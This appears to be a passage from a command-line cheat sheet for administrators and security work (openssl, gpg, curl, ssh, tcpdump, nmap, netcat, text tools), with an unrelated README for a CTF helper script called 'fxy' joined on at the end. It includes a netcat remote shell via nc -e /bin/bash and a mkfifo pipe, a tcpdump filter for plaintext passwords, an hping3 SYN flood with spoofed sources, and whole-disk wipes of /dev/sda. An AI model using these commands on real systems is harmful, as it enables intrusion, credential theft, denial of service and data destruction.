```bash
( _fd="private.key" ; \
openssl rsa -noout -text -in ${_fd} )
```
###### Verification of the public key
```bash
# 1)
( _fd="public.key" ; \
openssl pkey -noout -text -pubin -in ${_fd} )
# 2)
( _fd="private.key" ; \
openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \
if [ $? = 0 ] ; then echo -en "OK\n" ; fi )
```
###### Verification of the certificate
```bash
( _fd="certificate.crt" ; # format: pem, cer, crt \
openssl x509 -noout -text -in ${_fd} )
```
###### Verification of the CSR
```bash
( _fd_csr="request.csr" ; \
openssl req -text -noout -in ${_fd_csr} )
```
###### Check the private key and the certificate are match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq
```
###### Check the private key and the CSR are match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl req -noout -modulus -in request.csr | openssl md5) | uniq
```
---
##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk)
###### Secure delete with shred
```bash
shred -vfuz -n 10 file
shred --verbose --random-source=/dev/urandom -n 1 /dev/sda
```
###### Secure delete with scrub
```bash
scrub -p dod /dev/sda
scrub -p dod -r file
```
###### Secure delete with badblocks
```bash
badblocks -s -w -t random -v /dev/sda
badblocks -c 10240 -s -w -t random -v /dev/sda
```
###### Secure delete with secure-delete
```bash
srm -vz /tmp/file
sfill -vz /local
sdmem -v
swapoff /dev/sda5 && sswap -vz /dev/sda5
```
---
##### Tool: [dd](<https://en.wikipedia.org/wiki/Dd_(Unix)>)
###### Show dd status every so often
```bash
dd <dd_params> status=progress
watch --interval 5 killall -USR1 dd
```
###### Redirect output to a file with dd
```bash
echo "string" | dd of=filename
```
---
##### Tool: [gpg](https://www.gnupg.org/)
###### Export public key
```bash
gpg --export --armor "<username>" > username.pkey
```
- `--export` - export all keys from all keyrings or specific key
- `-a|--armor` - create ASCII armored output
###### Encrypt file
```bash
gpg -e -r "<username>" dump.sql
```
- `-e|--encrypt` - encrypt data
- `-r|--recipient` - encrypt for specific <username>
###### Decrypt file
```bash
gpg -o dump.sql -d dump.sql.gpg
```
- `-o|--output` - use as output file
- `-d|--decrypt` - decrypt data (default)
###### Search recipient
```bash
gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>"
```
- `--keyserver` - set specific key server
- `--search-keys` - search for keys on a key server
###### List all of the packets in an encrypted file
```bash
gpg --batch --list-packets archive.gpg
gpg2 --batch --list-packets archive.gpg
```
---
##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other)
###### Reboot system from init
```bash
exec /sbin/init 6
```
###### Init system from single user mode
```bash
exec /sbin/init
```
###### Show current working directory of a process
```bash
readlink -f /proc/<PID>/cwd
```
###### Show actual pathname of the executed command
```bash
readlink -f /proc/<PID>/exe
```
##### Tool: [curl](https://curl.haxx.se)
```bash
curl -Iks https://www.google.com
```
- `-I` - show response headers only
- `-k` - insecure connection when using ssl
- `-s` - silent mode (not display body)
```bash
curl -Iks --location -X GET -A "x-agent" https://www.google.com
```
- `--location` - follow redirects
- `-X` - set method
- `-A` - set user-agent
```bash
curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com
```
- `--proxy [socks5://|http://]` - set proxy server
```bash
curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf
```
- `-o` - write output to file
- `-C` - resume the transfer
###### Find your external IP address (external services)
```bash
curl ipinfo.io
curl ipinfo.io/ip
curl icanhazip.com
curl ifconfig.me/ip ; echo
```
###### Repeat URL request
```bash
# URL sequence substitution with a dummy query string:
curl -ks https://example.com/?[1-20]
# With shell 'for' loop:
for i in {1..20} ; do curl -ks https://example.com/ ; done
```
###### Check DNS and HTTP trace with headers for specific domains
```bash
### Set domains and external dns servers.
_domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1")
for _domain in "${_domain_list[@]}" ; do
printf '=%.0s' {1..48}
echo
printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain"
for _dns in "${_dns_list[@]}" ; do
# Resolve domain.
host "${_domain}" "${_dns}"
echo
done
for _proto in http https ; do
printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain"
# Get trace and http headers.
curl -Iks -A "x-agent" --location "${_proto}://${_domain}"
echo
done
done
unset _domain_list _dns_list
```
---
##### Tool: [httpie](https://httpie.org/)
```bash
http -p Hh https://www.google.com
```
- `-p` - print request and response headers
- `H` - request headers
- `B` - request body
- `h` - response headers
- `b` - response body
```bash
http -p Hh https://www.google.com --follow --verify no
```
- `-F, --follow` - follow redirects
- `--verify no` - skip SSL verification
```bash
http -p Hh https://www.google.com --follow --verify no \
--proxy http:http://127.0.0.1:16379
```
- `--proxy [http:]` - set proxy server
##### Tool: [ssh](https://www.openssh.com/)
###### Escape Sequence
```
# Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
```
###### Compare a remote file with a local file
```bash
ssh user@host cat /path/to/remotefile | diff /path/to/localfile -
```
###### SSH connection through host in the middle
```bash
ssh -t reachable_host ssh unreachable_host
```
###### Run command over SSH on remote host
```bash
cat > cmd.txt << __EOF__
cat /etc/hosts
__EOF__
ssh host -l user $(<cmd.txt)
```
###### Get public key from private key
```bash
ssh-keygen -y -f ~/.ssh/id_rsa
```
###### Get all fingerprints
```bash
ssh-keygen -l -f .ssh/known_hosts
```
###### SSH authentication with user password
```bash
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host
```
###### SSH authentication with publickey
```bash
ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host
```
###### Simple recording SSH session
```bash
function _ssh_sesslog() {
_sesdir="<path/to/session/logs>"
mkdir -p "${_sesdir}" && \
ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log"
}
# Alias:
alias ssh='_ssh_sesslog'
```
###### Using Keychain for SSH logins
```bash
### Delete all of ssh-agent's keys.
function _scl() {
/usr/bin/keychain --clear
}
### Add key to keychain.
function _scg() {
/usr/bin/keychain /path/to/private-key
source "$HOME/.keychain/$HOSTNAME-sh"
}
```
###### SSH login without processing any login scripts
```bash
ssh -tt user@host bash
```
###### SSH local port forwarding
Example 1:
```bash
# Forwarding our local 2250 port to nmap.org:443 from localhost through localhost
host1> ssh -L 2250:nmap.org:443 localhost
# Connect to the service:
host1> curl -Iks --location -X GET https://localhost:2250
```
Example 2:
```bash
# Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y
host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y
# Connect to the service:
host1> psql -U db_user -d db_dev -p 9051 -h localhost
```
- `-n` - redirects stdin from `/dev/null`
- `-N` - do not execute a remote command
- `-T` - disable pseudo-terminal allocation
###### SSH remote port forwarding
```bash
# Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y
host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y
# Connect to the service:
host2> psql -U postgres -d postgres -p 8000 -h localhost
```
---
##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html)
###### Testing remote connection to port
```bash
timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $?
```
- `<proto` - set protocol (tcp/udp)
- `<host>` - set remote host
- `<port>` - set destination port
###### Read and write to TCP or UDP sockets with common bash tools
```bash
exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&-
```
---
##### Tool: [tcpdump](http://www.tcpdump.org/)
###### Filter incoming (on interface) traffic (specific <ip:port>)
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443
```
- `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports)
- `-e` - print the link-level headers
- `-i [iface|any]` - set interface
- `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions)
- `host [ip|hostname]` - set host, also `[host not]`
- `[and|or]` - set logic
- `port [1-65535]` - set port number, also `[port not]`
###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap
```
- `-c [num]` - capture only num number of packets
- `-w [filename]` - write packets to file, `-r [filename]` - reading from file
###### Capture all ICMP packets
```bash
tcpdump -nei eth0 icmp
```
###### Check protocol used (TCP or UDP) for service
```bash
tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP"
```
###### Display ASCII text (to parse the output using grep or other)
```bash
tcpdump -i eth0 -A -s0 port 443
```
###### Grab everything between two keywords
```bash
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'
```
###### Grab user and pass ever plain http
```bash
tcpdump -i eth0 port http -l -A | egrep -i \
'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \
--color=auto --line-buffered -B20
```
###### Extract HTTP User Agent from HTTP request header
```bash
tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:"
```
###### Capture only HTTP GET and POST packets
```bash
tcpdump -ei eth0 -s 0 -A -vv \
'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
```
or simply:
```bash
tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
```
###### Rotate capture files
```bash
tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200
```
- `-G <num>` - pcap will be created every `<num>` seconds
- `-C <size>` - close the current pcap and open a new one if is larger than `<size>`
###### Top hosts by packets
```bash
tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20
```
###### Excludes any RFC 1918 private address
```bash
tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))'
```
---
##### Tool: [tcpick](http://tcpick.sourceforge.net/)
###### Analyse packets in real-time
```bash
while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done
```
---
##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html)
```bash
ngrep -d eth0 "www.domain.com" port 443
```
- `-d [iface|any]` - set interface
- `[domain]` - set hostname
- `port [1-65535]` - set port number
```bash
ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443
```
- `(host [ip|hostname])` - filter by ip or hostname
- `(port [1-65535])` - filter by port number
```bash
ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443
```
- `-q` - quiet mode (only payloads)
- `-t` - added timestamps
- `-O [filename]` - save output to file, `-I [filename]` - reading from file
```bash
ngrep -d eth0 -qt 'HTTP' 'tcp'
```
- `HTTP` - show http headers
- `tcp|udp` - set protocol
- `[src|dst] host [ip|hostname]` - set direction for specific node
```bash
ngrep -l -q -d eth0 -i "User-Agent: curl*"
```
- `-l` - stdout line buffered
- `-i` - case-insensitive search
---
##### Tool: [hping3](http://www.hping.org/)
```bash
hping3 -V -p 80 -s 5050 <scan_type> www.google.com
```
- `-V|--verbose` - verbose mode
- `-p|--destport` - set destination port
- `-s|--baseport` - set source port
- `<scan_type>` - set scan type
- `-F|--fin` - set FIN flag, port open if no reply
- `-S|--syn` - set SYN flag
- `-P|--push` - set PUSH flag
- `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open)
- `-U|--urg` - set URG flag
- `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply
- `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply
```bash
hping3 -V -c 1 -1 -C 8 www.google.com
```
- `-c [num]` - packet count
- `-1` - set ICMP mode
- `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8)
```bash
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>
```
- `--flood` - sent packets as fast as possible (don't show replies)
- `--rand-source` - random source address mode
- `-d --data` - data size
- `-w|--win` - winsize (default 64)
---
##### Tool: [nmap](https://nmap.org/)
###### Ping scans the network
```bash
nmap -sP 192.168.0.0/24
```
###### Show only open ports
```bash
nmap -F --open 192.168.0.0/24
```
###### Full TCP port scan using with service version detection
```bash
nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24
```
###### Nmap scan and pass output to Nikto
```bash
nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h -
```
###### Recon specific ip:service with Nmap NSE scripts stack
```bash
# Set variables:
_hosts="192.168.250.10"
_ports="80,443"
# Set Nmap NSE scripts stack:
_nmap_nse_scripts="+dns-brute,\
+http-auth-finder,\
+http-chrono,\
+http-cookie-flags,\
+http-cors,\
+http-cross-domain-policy,\
+http-csrf,\
+http-dombased-xss,\
+http-enum,\
+http-errors,\
+http-git,\
+http-grep,\
+http-internal-ip-disclosure,\
+http-jsonp-detection,\
+http-malware-host,\
+http-methods,\
+http-passwd,\
+http-phpself-xss,\
+http-php-version,\
+http-robots.txt,\
+http-sitemap-generator,\
+http-shellshock,\
+http-stored-xss,\
+http-title,\
+http-unsafe-output-escaping,\
+http-useragent-tester,\
+http-vhosts,\
+http-waf-detect,\
+http-waf-fingerprint,\
+http-xssed,\
+traceroute-geolocation.nse,\
+ssl-enum-ciphers,\
+whois-domain,\
+whois-ip"
# Set Nmap NSE script params:
_nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true,"
_nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges,"
_nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1"
# Perform scan:
nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts"
```
---
##### Tool: [netcat](http://netcat.sourceforge.net/)
```bash
nc -kl 5000
```
- `-l` - listen for an incoming connection
- `-k` - listening after client has disconnected
- `>filename.out` - save receive data to file (optional)
```bash
nc 192.168.0.1 5051 < filename.in
```
- `< filename.in` - send data to remote host
```bash
nc -vz 10.240.30.3 5000
```
- `-v` - verbose output
- `-z` - scan for listening daemons
```bash
nc -vzu 10.240.30.3 1-65535
```
- `-u` - scan only udp ports
###### Transfer data file (archive)
```bash
server> nc -l 5000 | tar xzvfp -
client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
```
###### Launch remote shell
```bash
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000
# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000
```
###### Simple file server
```bash
while true ; do nc -l 5000 | tar -xvf - ; done
```
###### Simple minimal HTTP Server
```bash
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done
```
###### Simple HTTP Server
> Restarts web server after each request - remove `while` condition for only single connection.
```bash
cat > index.html << __EOF__
<!doctype html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<p>
Hello! It's a site.
</p>
</body>
</html>
__EOF__
```
```bash
server> while : ; do \
(echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \
nc -l -p 5000 \
; done
```
- `-p` - port number
###### Simple HTTP Proxy (single connection)
```bash
#!/usr/bin/env bash
if [[ $# != 2 ]] ; then
printf "%s\\n" \
"usage: ./nc-proxy listen-port bk_host:bk_port"
fi
_listen_port="$1"
_bk_host=$(echo "$2" | cut -d ":" -f1)
_bk_port=$(echo "$2" | cut -d ":" -f2)
printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \
"$_listen_port" "$_bk_host" "$_bk_port"
_tmp=$(mktemp -d)
_back="$_tmp/pipe.back"
_sent="$_tmp/pipe.sent"
_recv="$_tmp/pipe.recv"
trap 'rm -rf "$_tmp"' EXIT
mkfifo -m 0600 "$_back" "$_sent" "$_recv"
sed "s/^/=> /" <"$_sent" &
sed "s/^/<= /" <"$_recv" &
nc -l -p "$_listen_port" <"$_back" | \
tee "$_sent" | \
nc "$_bk_host" "$_bk_port" | \
tee "$_recv" >"$_back"
```
```bash
server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000
lport: 8080
bk_host: 192.168.252.10
bk_port: 8000
client> http -p h 10.240.30.3:8080
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 2748
Content-Type: text/html; charset=utf-8
Date: Sun, 01 Jul 2018 20:12:08 GMT
Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT
```
###### Create a single-use TCP or UDP proxy
```bash
### TCP -> TCP
nc -l -p 2000 -c "nc [ip|hostname] 3000"
### TCP -> UDP
nc -l -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> UDP
nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> TCP
nc -l -u -p 2000 -c "nc [ip|hostname] 3000"
```
---
##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html)
###### Testing connection to remote host (with SNI support)
```bash
gnutls-cli -p 443 google.com
```
###### Testing connection to remote host (without SNI support)
```bash
gnutls-cli --disable-sni -p 443 google.com
```
---
##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html)
###### Testing remote connection to port
```bash
socat - TCP4:10.240.30.3:22
```
- `-` - standard input (STDIO)
- `TCP4:<params>` - set tcp4 connection with specific params
- `[hostname|ip]` - set hostname/ip
- `[1-65535]` - set port number
###### Redirecting TCP-traffic to a UNIX domain socket under Linux
```bash
socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo
```
- `TCP-LISTEN:<params>` - set tcp listen with specific params
- `[1-65535]` - set port number
- `bind=[hostname|ip]` - set bind hostname/ip
- `reuseaddr` - allows other sockets to bind to an address
- `fork` - keeps the parent process attempting to produce more connections
- `su=nobody` - set user
- `range=[ip-range]` - ip range
- `UNIX-CLIENT:<params>` - communicates with the specified peer socket
- `filename` - define socket
---
##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/)
###### Set iface in promiscuous mode and dump traffic to the log file
```bash
p0f -i enp0s25 -p -d -o /dump/enp0s25.log
```
- `-i` - listen on the specified interface
- `-p` - set interface in promiscuous mode
- `-d` - fork into background
- `-o` - output file
---
##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat)
###### Graph # of connections for each hosts
```bash
netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \
sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }'
```
###### Monitor open connections for specific port including listen, count and sort it per IP
```bash
watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1"
```
###### Grab banners from local IPv4 listening ports
```bash
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
```
---
##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync)
###### Rsync remote data as root using sudo
```bash
rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/
```
---
##### Tool: [host](<https://en.wikipedia.org/wiki/Host_(Unix)>)
###### Resolves the domain name (using external dns server)
```bash
host google.com 9.9.9.9
```
###### Checks the domain administrator (SOA record)
```bash
host -t soa google.com 9.9.9.9
```
---
##### Tool: [dig](<https://en.wikipedia.org/wiki/Dig_(command)>)
###### Resolves the domain name (short output)
```bash
dig google.com +short
```
###### Lookup NS record for specific domain
```bash
dig @9.9.9.9 google.com NS
```
###### Query only answer section
```bash
dig google.com +nocomments +noquestion +noauthority +noadditional +nostats
```
###### Query ALL DNS Records
```bash
dig google.com ANY +noall +answer
```
###### DNS Reverse Look-up
```bash
dig -x 172.217.16.14 +short
```
---
##### Tool: [certbot](https://certbot.eff.org/)
###### Generate multidomain certificate
```bash
certbot certonly -d example.com -d www.example.com
```
###### Generate wildcard certificate
```bash
certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com
```
###### Generate certificate with 4096 bit private key
```bash
certbot certonly -d example.com -d www.example.com --rsa-key-size 4096
```
---
##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other)
###### Get all subnets for specific AS (Autonomous system)
```bash
AS="AS32934"
whois -h whois.radb.net -- "-i origin ${AS}" | \
grep "^route:" | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]//' | \
sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]/allow /' | \
sed 's/$/;/' | \
sed 's/allow */subnet -> /g'
```
###### Resolves domain name from dns.google.com with curl and jq
```bash
_dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq .
```
##### Tool: [git](https://git-scm.com/)
###### Log alias for a decent view of your repo
```bash
# 1)
git log --oneline --decorate --graph --all
# 2)
git log --graph \
--pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \
--abbrev-commit
```
---
##### Tool: [python](https://www.python.org/)
###### Static HTTP web server
```bash
# Python 3.x
python3 -m http.server 8000 --bind 127.0.0.1
# Python 2.x
python -m SimpleHTTPServer 8000
```
###### Static HTTP web server with SSL support
```bash
# Python 3.x
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/to/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
# Python 2.x
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/tp/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
```
###### Encode base64
```bash
python -m base64 -e <<< "sample string"
```
###### Decode base64
```bash
python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg=="
```
##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html)
###### Search for matching lines
```bash
# egrep foo
awk '/foo/' filename
```
###### Search non matching lines
```bash
# egrep -v foo
awk '!/foo/' filename
```
###### Print matching lines with numbers
```bash
# egrep -n foo
awk '/foo/{print FNR,$0}' filename
```
###### Print the last column
```bash
awk '{print $NF}' filename
```
###### Find all the lines longer than 80 characters
```bash
awk 'length($0)>80{print FNR,$0}' filename
```
###### Print only lines of less than 80 characters
```bash
awk 'length < 80' filename
```
###### Print double new lines a file
```bash
awk '1; { print "" }' filename
```
###### Print line numbers
```bash
awk '{ print FNR "\t" $0 }' filename
awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner
```
###### Print line numbers for only non-blank lines
```bash
awk 'NF { $0=++a " :" $0 }; { print }' filename
```
###### Print the line and the next two (i=5) lines after the line matching regexp
```bash
awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename
```
###### Print the lines starting at the line matching 'server {' until the line matching '}'
```bash
awk '/server {/,/}/' filename
```
###### Print multiple columns with separators
```bash
awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename
```
###### Remove empty lines
```bash
awk 'NF > 0' filename
# alternative:
awk NF filename
```
###### Delete trailing white space (spaces, tabs)
```bash
awk '{sub(/[ \t]*$/, "");print}' filename
```
###### Delete leading white space
```bash
awk '{sub(/^[ \t]+/, ""); print}' filename
```
###### Remove duplicate consecutive lines
```bash
# uniq
awk 'a !~ $0{print}; {a=$0}' filename
```
###### Remove duplicate entries in a file without sorting
```bash
awk '!x[$0]++' filename
```
###### Exclude multiple columns
```bash
awk '{$1=$3=""}1' filename
```
###### Substitute foo for bar on lines matching regexp
```bash
awk '/regexp/{gsub(/foo/, "bar")};{print}' filename
```
###### Add some characters at the beginning of matching lines
```bash
awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename
```
###### Get the last hour of Apache logs
```bash
awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \
/var/log/httpd/access_log
```
---
##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html)
###### Print a specific line from a file
```bash
sed -n 10p /path/to/file
```
###### Remove a specific line from a file
```bash
sed -i 10d /path/to/file
# alternative (BSD): sed -i'' 10d /path/to/file
```
###### Remove a range of lines from a file
```bash
sed -i <file> -re '<start>,<end>d'
```
###### Replace newline(s) with a space
```bash
sed ':a;N;$!ba;s/\n/ /g' /path/to/file
# cross-platform compatible syntax:
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file
```
- `:a` create a label `a`
- `N` append the next line to the pattern space
- `$!` if not the last line, ba branch (go to) label `a`
- `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can)
Alternatives:
```bash
# perl version (sed-like speed):
perl -p -e 's/\n/ /' /path/to/file
# bash version (slow):
while read line ; do printf "%s" "$line " ; done < file
```
###### Delete string +N next lines
```bash
sed '/start/,+4d' /path/to/file
```
---
##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html)
###### Search for a "pattern" inside all files in the current directory
```bash
grep -rn "pattern"
grep -RnisI "pattern" *
fgrep "pattern" * -R
```
###### Show only for multiple patterns
```bash
grep 'INFO*'\''WARN' filename
grep 'INFO\|WARN' filename
grep -e INFO -e WARN filename
grep -E '(INFO|WARN)' filename
egrep "INFO|WARN" filename
```
###### Except multiple patterns
```bash
grep -vE '(error|critical|warning)' filename
```
###### Show data from file without comments
```bash
grep -v ^[[:space:]]*# filename
```
###### Show data from file without comments and new lines
```bash
egrep -v '#|^$' filename
```
###### Show strings with a dash/hyphen
```bash
grep -e -- filename
grep -- -- filename
grep "\-\-" filename
```
###### Remove blank lines from a file and save output to new file
```bash
grep . filename > newfilename
```
##### Tool: [perl](https://www.perl.org/)
###### Search and replace (in place)
```bash
perl -i -pe's/SEARCH/REPLACE/' filename
```
###### Edit of `*.conf` files changing all foo to bar (and backup original)
```bash
perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf
```
###### Prints the first 20 lines from `*.conf` files
```bash
perl -pe 'exit if $. > 20' *.conf
```
###### Search lines 10 to 20
```bash
perl -ne 'print if 10 .. 20' filename
```
###### Delete first 10 lines (and backup original)
```bash
perl -i.orig -ne 'print unless 1 .. 10' filename
```
###### Delete all but lines between foo and bar (and backup original)
```bash
perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename
```
###### Reduce multiple blank lines to a single line
```bash
perl -p -i -00pe0 filename
```
###### Convert tabs to spaces (1t = 2sp)
```bash
perl -p -i -e 's/\t/ /g' filename
```
###### Read input from a file and report number of lines and characters
```bash
perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename
```
#### Shell functions [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
- [Domain resolve](#domain-resolve)
- [Get ASN](#get-asn)
###### Domain resolve
```bash
# Dependencies:
# - curl
# - jq
function DomainResolve() {
local _host="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \
jq '.Answer[0].data' | tr -d "\"" 2>/dev/null)
if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then
echo -en "Unsuccessful domain name resolution.\\n"
else
echo -en "$_host > $_host_ip\\n"
fi
}
```
Example:
```bash
shell> DomainResolve nmap.org
nmap.org > 45.33.49.119
shell> DomainResolve nmap.org
Unsuccessful domain name resolution.
```
###### Get ASN
```bash
# Dependencies:
# - curl
function GetASN() {
local _ip="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as")
_state=$(echo $?)
if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then
echo -en "Unsuccessful ASN gathering.\\n"
else
echo -en "$_ip > $_asn\\n"
fi
}
```
Example:
```bash
shell> GetASN 1.1.1.1
1.1.1.1 > AS13335 Cloudflare, Inc.
shell> GetASN 0.0.0.0
Unsuccessful ASN gathering.
```
|
# fxy - Fox in the $hell
fxy is a small and smart bash script for fast command generation of common hacking and CTF related tasks. The source is completely modularized and adding new commands is super easy.
```
. .
|\__/|
/ \ | FXY || Fox in the $hell |
/_,- -,_\ | github.com/doomguy/fxy |
\@/
Available commands:
fxy b(ase)64(e|d) [input] : Base64 Encode/Decode
fxy cewl [s(sl)|tls] [subdir] : cewl PROTO://RHOST+SUBDIR -w RHOST_cewl.txt
fxy ciph(ey) [input] : ciphey -t INPUT
fxy cme|crackmapexec [smb] : crackmapexec smb RHOST | tee
fxy c(reds) [a(dd) user:pass]|[d(el) cid]|[e(dit)] : Show/Add/Del/Edit creds
fxy curl [s(sl)|tls] [subdir] : curl -si PROTO://RHOST+SUBDIR | less
fxy (cyber)chef [magic] : Open CyberChef in your browser
